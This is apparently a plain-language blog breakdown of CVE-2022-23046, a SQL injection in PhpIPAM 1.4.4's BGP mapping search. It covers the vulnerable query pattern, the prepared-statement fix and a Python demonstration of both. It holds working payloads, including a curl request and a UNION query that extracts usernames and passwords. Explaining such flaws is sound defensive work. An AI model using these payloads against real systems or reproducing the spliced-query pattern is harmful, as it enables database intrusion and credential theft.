Introduction
In this post, we’ll break down CVE-2022-23046, a critical SQL Injection vulnerability discovered in the popular IP address management tool, PhpIPAM (v1.4.4). This flaw allows an authenticated admin user to compromise the system by injecting malicious SQL code through the subnet parameter in the BGP mapping search functionality. We'll keep the language simple and walk through the details, demonstrate the exploit with a snippet, and offer important links for more info.
What is PhpIPAM?
PhpIPAM is an open-source web application used to manage and organize IP space. It's widely used by network admins to keep track of subnets, IPs, and VLANs.
What is CVE-2022-23046?
Short version: Admin users can inject SQL commands using the subnet parameter while searching for a subnet in the BGP mapping admin page, specifically in app/admin/routing/edit-bgp-mapping-search.php. This can lead to sensitive data leakage, modification, or even complete database compromise.
References:
- NVD Entry
- Exploit DB Article
- Original Github Issue
Where’s the Problem?
When an admin searches for a subnet in the BGP mapping interface, their input is not sanitized or parameterized before being included in a SQL query in edit-bgp-mapping-search.php.
Let’s imagine the problematic part looks something like this:
$subnet = $_POST['subnet']; // Admin-supplied subnet, used as-is
// ... later
$q = "SELECT * FROM subnets WHERE subnet = '$subnet'"; // input pasted straight into the query string
$result = mysqli_query($db, $q);
If $subnet is not properly sanitized, whatever the user puts in gets pasted right into the SQL statement.
In the search box for subnets, enter a crafted value like
' OR 1=1-- -
This tells SQL to ignore the subnet and return all records (or potentially something worse, depending on your payload).
Exploit Snippet
Sample malicious request using curl (replace COOKIE_NAME=COOKIE_VALUE and the URL accordingly; curl's --cookie expects the NAME=VALUE form, otherwise it treats the argument as a file name):
curl -X POST \
-d "subnet=' OR 1=1-- -" \
--cookie "COOKIE_NAME=COOKIE_VALUE" \
https://your.phpipam.instance/app/admin/routing/edit-bgp-mapping-search.php
What happens?
The SQL query becomes:
SELECT * FROM subnets WHERE subnet = '' OR 1=1-- -'
Now, all subnets are returned (or worse if more complex payloads are used). If you tweak further, you could try exfiltrating data:
' UNION SELECT user, password, email FROM users-- -
Why Is This “Authenticated-Admin Only”?
Only users with admin-level access can hit this endpoint. A rogue or compromised admin could seriously damage the installation, or escalate from here if other protections are weak.
Patch & Mitigation
- Update! A patch is provided in later PhpIPAM versions (Github Commit)
- Developers replaced direct variable insertion with properly prepared statements:
$q = $db->prepare("SELECT * FROM subnets WHERE subnet = ?");
$q->execute([$subnet]);
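To make the before/after concrete, here is an added example (not PhpIPAM's code) that runs both query styles against a constructed in-memory SQLite table and counts what each returns for a normal search and for the payload shown above; the table layout is an assumption, not PhpIPAM's real schema.

```python
import sqlite3

# Constructed stand-in for the subnets table (assumption: not PhpIPAM's real schema).
SAMPLE_SUBNETS = [
    ("10.0.0.0/8", "corp"),
    ("192.168.1.0/24", "lab"),
    ("172.16.0.0/12", "dmz"),
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE subnets (id INTEGER PRIMARY KEY, subnet TEXT, description TEXT)")
    db.executemany("INSERT INTO subnets (subnet, description) VALUES (?, ?)", SAMPLE_SUBNETS)
    return db


def search_vulnerable(db, subnet):
    # Mirrors the flawed pattern: the request value is spliced into the SQL text,
    # so a quote in the input changes the structure of the statement.
    q = f"SELECT id, subnet FROM subnets WHERE subnet = '{subnet}'"
    return db.execute(q).fetchall()


def search_fixed(db, subnet):
    # Mirrors the fix: a placeholder keeps the input as a bound value only,
    # so the same payload is compared literally against the subnet column.
    q = "SELECT id, subnet FROM subnets WHERE subnet = ?"
    return db.execute(q, (subnet,)).fetchall()


def compare(subnet):
    """Return (rows from vulnerable query, rows from fixed query) for one input."""
    db = make_db()
    return len(search_vulnerable(db, subnet)), len(search_fixed(db, subnet))


if __name__ == "__main__":
    for value in ("10.0.0.0/8", "' OR 1=1-- -"):
        print(repr(value), "->", compare(value))
```

For the legitimate subnet both versions return one row; for the payload the vulnerable query returns every row while the fixed one returns none, which is the whole difference the patch makes.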
Takeaway
Even trusted admin interfaces must defend against SQL injection. This kind of vulnerability, even “authenticated-only,” is dangerous, especially in tools that manage critical network infrastructure like PhpIPAM.
References
- PhpIPAM Security Github
- Mitre CVE Entry
- Exploit-DB Example
- OWASP on SQL Injection
Closing
Questions or want more security breakdowns in plain language? Comment below or follow for updates!
Timeline
Published on: 01/19/2022 21:15:00 UTC
Last modified on: 02/11/2022 14:01:00 UTC